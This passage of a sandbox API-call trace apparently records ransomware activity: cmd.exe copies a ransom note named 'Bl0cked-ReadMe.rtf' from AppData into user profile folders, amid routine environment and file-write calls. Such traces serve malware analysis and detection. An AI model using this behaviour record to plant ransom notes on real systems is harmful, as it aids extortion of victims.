lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0210.974] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0210.974] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0210.974] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0210.974] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0210.974] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0210.974] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0210.974] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0210.974] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0210.974] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0210.974] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0210.974] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0210.974] GetEnvironmentStringsW () returned 0x2c22d0* [0210.974] FreeEnvironmentStringsW (penv=0x2c22d0) returned 1 [0210.975] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0210.975] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0210.975] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0210.975] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0210.975] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0210.975] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0210.975] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0210.975] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0210.975] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 
[0210.975] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0210.975] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f880 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0210.975] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22f880, lpFilePart=0x22f87c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f87c*="Desktop") returned 0x18 [0210.975] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0210.975] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f5fc | out: lpFindFileData=0x22f5fc) returned 0x2c0010 [0210.975] FindClose (in: hFindFile=0x2c0010 | out: hFindFile=0x2c0010) returned 1 [0210.975] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f5fc | out: lpFindFileData=0x22f5fc) returned 0x2c0010 [0210.975] FindClose (in: hFindFile=0x2c0010 | out: hFindFile=0x2c0010) returned 1 [0210.975] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f5fc | out: lpFindFileData=0x22f5fc) returned 0x2c0010 [0210.976] FindClose (in: hFindFile=0x2c0010 | out: hFindFile=0x2c0010) returned 1 [0210.976] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0210.976] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0210.976] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0210.976] GetEnvironmentStringsW () returned 0x2c2af0* [0210.976] FreeEnvironmentStringsW (penv=0x2c2af0) returned 1 [0210.976] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0210.976] GetConsoleOutputCP () returned 0x1b5 [0210.976] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) 
returned 1 [0210.977] GetUserDefaultLCID () returned 0x409 [0210.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0210.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f9c0, cchData=128 | out: lpLCData="0") returned 2 [0210.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f9c0, cchData=128 | out: lpLCData="0") returned 2 [0210.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f9c0, cchData=128 | out: lpLCData="1") returned 2 [0210.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0210.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0210.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0210.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0210.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0210.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0210.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0210.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0210.977] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0210.977] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0210.977] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0210.978] GetConsoleTitleW (in: lpConsoleTitle=0x2b08e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b 
[0210.978] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0210.978] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0210.978] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0210.978] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0210.979] _wcsicmp (_String1="type", _String2=")") returned 75 [0210.979] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0210.979] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0210.979] _wcsicmp (_String1="IF", _String2="type") returned -11 [0210.979] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0210.979] _wcsicmp (_String1="REM", _String2="type") returned -2 [0210.979] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0210.983] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.983] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.983] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.983] GetFileType (hFile=0x7) returned 0x2 [0210.983] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0210.983] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f8b8 | out: lpMode=0x22f8b8) returned 1 [0210.983] _dup (_FileHandle=1) returned 3 [0210.983] _close (_FileHandle=1) returned 0 [0210.984] _wcsicmp (_String1="C:\\Users\\Default\\FAVORI~1\\Links\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0210.984] CreateFileW (lpFileName="C:\\Users\\Default\\FAVORI~1\\Links\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\favori~1\\links\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x22f888, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0210.985] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0210.985] GetConsoleTitleW (in: lpConsoleTitle=0x22f6b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0210.985] _wcsicmp 
(_String1="type", _String2="DIR") returned 16 [0210.985] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0210.985] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0210.985] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0210.986] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0210.986] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x22f21c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f21c) returned 0x2b0e70 [0210.986] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0210.986] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0210.986] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0210.986] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22e128, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0210.987] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0210.987] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.987] GetFileType (hFile=0x54) returned 0x1 [0210.987] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.987] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x22e180 | out: lpFileSizeHigh=0x22e180*=0x0) returned 0x1632 [0210.987] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.987] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.987] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.987] ReadFile (in: hFile=0x54, lpBuffer=0x22efb8, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x22e1a8, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesRead=0x22e1a8*=0x200, lpOverlapped=0x0) returned 1 [0210.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.988] GetFileType (hFile=0x4c) returned 0x1 [0210.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.988] GetFileType (hFile=0x4c) returned 0x1 [0210.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.988] WriteFile (in: hFile=0x4c, lpBuffer=0x22efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.989] GetFileType (hFile=0x4c) returned 0x1 [0210.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.989] WriteFile (in: hFile=0x4c, lpBuffer=0x22f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f008*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.990] GetFileType (hFile=0x4c) returned 0x1 [0210.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.990] WriteFile (in: hFile=0x4c, lpBuffer=0x22f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f058*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.990] GetFileType (hFile=0x4c) returned 0x1 [0210.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.990] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0a8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.990] GetFileType (hFile=0x4c) returned 0x1 [0210.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.990] WriteFile (in: 
hFile=0x4c, lpBuffer=0x22f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0f8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.990] GetFileType (hFile=0x4c) returned 0x1 [0210.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.990] WriteFile (in: hFile=0x4c, lpBuffer=0x22f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f148*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.990] GetFileType (hFile=0x4c) returned 0x1 [0210.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.990] WriteFile (in: hFile=0x4c, lpBuffer=0x22f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f198*, lpNumberOfBytesWritten=0x22e19c*=0x20, lpOverlapped=0x0) returned 1 [0210.990] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.990] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e188 | out: lpNewFilePointer=0x0) returned 1 [0210.990] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.990] ReadFile (in: hFile=0x54, lpBuffer=0x22efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e1a8, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesRead=0x22e1a8*=0x200, lpOverlapped=0x0) returned 1 [0210.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.990] GetFileType (hFile=0x4c) returned 0x1 [0210.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.991] GetFileType (hFile=0x4c) returned 0x1 [0210.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.991] WriteFile (in: hFile=0x4c, lpBuffer=0x22efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.991] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0210.991] GetFileType (hFile=0x4c) returned 0x1 [0210.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.991] WriteFile (in: hFile=0x4c, lpBuffer=0x22f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f008*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.991] GetFileType (hFile=0x4c) returned 0x1 [0210.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.991] WriteFile (in: hFile=0x4c, lpBuffer=0x22f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f058*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.991] GetFileType (hFile=0x4c) returned 0x1 [0210.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.991] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0a8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.991] GetFileType (hFile=0x4c) returned 0x1 [0210.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.991] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0f8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.991] GetFileType (hFile=0x4c) returned 0x1 [0210.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.991] WriteFile (in: hFile=0x4c, lpBuffer=0x22f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f148*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.991] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0210.991] GetFileType (hFile=0x4c) returned 0x1 [0210.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.991] WriteFile (in: hFile=0x4c, lpBuffer=0x22f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f198*, lpNumberOfBytesWritten=0x22e19c*=0x20, lpOverlapped=0x0) returned 1 [0210.991] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.991] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e188 | out: lpNewFilePointer=0x0) returned 1 [0210.992] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.992] ReadFile (in: hFile=0x54, lpBuffer=0x22efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e1a8, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesRead=0x22e1a8*=0x200, lpOverlapped=0x0) returned 1 [0210.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.992] GetFileType (hFile=0x4c) returned 0x1 [0210.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.992] GetFileType (hFile=0x4c) returned 0x1 [0210.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.992] WriteFile (in: hFile=0x4c, lpBuffer=0x22efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.992] GetFileType (hFile=0x4c) returned 0x1 [0210.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.992] WriteFile (in: hFile=0x4c, lpBuffer=0x22f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f008*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.992] GetFileType (hFile=0x4c) returned 0x1 [0210.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.992] WriteFile (in: hFile=0x4c, lpBuffer=0x22f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, 
lpOverlapped=0x0 | out: lpBuffer=0x22f058*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.992] GetFileType (hFile=0x4c) returned 0x1 [0210.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.992] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0a8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.992] GetFileType (hFile=0x4c) returned 0x1 [0210.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.992] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0f8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.992] GetFileType (hFile=0x4c) returned 0x1 [0210.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.992] WriteFile (in: hFile=0x4c, lpBuffer=0x22f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f148*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.993] GetFileType (hFile=0x4c) returned 0x1 [0210.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.993] WriteFile (in: hFile=0x4c, lpBuffer=0x22f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f198*, lpNumberOfBytesWritten=0x22e19c*=0x20, lpOverlapped=0x0) returned 1 [0210.993] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.993] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e188 | out: lpNewFilePointer=0x0) returned 1 [0210.993] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.993] ReadFile (in: hFile=0x54, lpBuffer=0x22efb8, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e1a8, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesRead=0x22e1a8*=0x200, lpOverlapped=0x0) returned 1 [0210.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.993] GetFileType (hFile=0x4c) returned 0x1 [0210.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.993] GetFileType (hFile=0x4c) returned 0x1 [0210.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.993] WriteFile (in: hFile=0x4c, lpBuffer=0x22efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.993] GetFileType (hFile=0x4c) returned 0x1 [0210.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.993] WriteFile (in: hFile=0x4c, lpBuffer=0x22f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f008*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.993] GetFileType (hFile=0x4c) returned 0x1 [0210.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.993] WriteFile (in: hFile=0x4c, lpBuffer=0x22f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f058*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.993] GetFileType (hFile=0x4c) returned 0x1 [0210.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.993] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0a8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.993] GetFileType (hFile=0x4c) returned 0x1 [0210.993] _get_osfhandle (_FileHandle=1) returned 
0x4c [0210.993] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0f8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.994] GetFileType (hFile=0x4c) returned 0x1 [0210.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.994] WriteFile (in: hFile=0x4c, lpBuffer=0x22f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f148*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.994] GetFileType (hFile=0x4c) returned 0x1 [0210.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.994] WriteFile (in: hFile=0x4c, lpBuffer=0x22f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f198*, lpNumberOfBytesWritten=0x22e19c*=0x20, lpOverlapped=0x0) returned 1 [0210.994] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.994] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e188 | out: lpNewFilePointer=0x0) returned 1 [0210.994] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.994] ReadFile (in: hFile=0x54, lpBuffer=0x22efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e1a8, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesRead=0x22e1a8*=0x200, lpOverlapped=0x0) returned 1 [0210.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.994] GetFileType (hFile=0x4c) returned 0x1 [0210.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.994] GetFileType (hFile=0x4c) returned 0x1 [0210.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.994] WriteFile (in: hFile=0x4c, lpBuffer=0x22efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) 
returned 1 [0210.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.994] GetFileType (hFile=0x4c) returned 0x1 [0210.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.994] WriteFile (in: hFile=0x4c, lpBuffer=0x22f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f008*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.994] GetFileType (hFile=0x4c) returned 0x1 [0210.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.995] WriteFile (in: hFile=0x4c, lpBuffer=0x22f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f058*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.995] GetFileType (hFile=0x4c) returned 0x1 [0210.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.995] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0a8*, nNumberOfBytesToWrite=0x50, 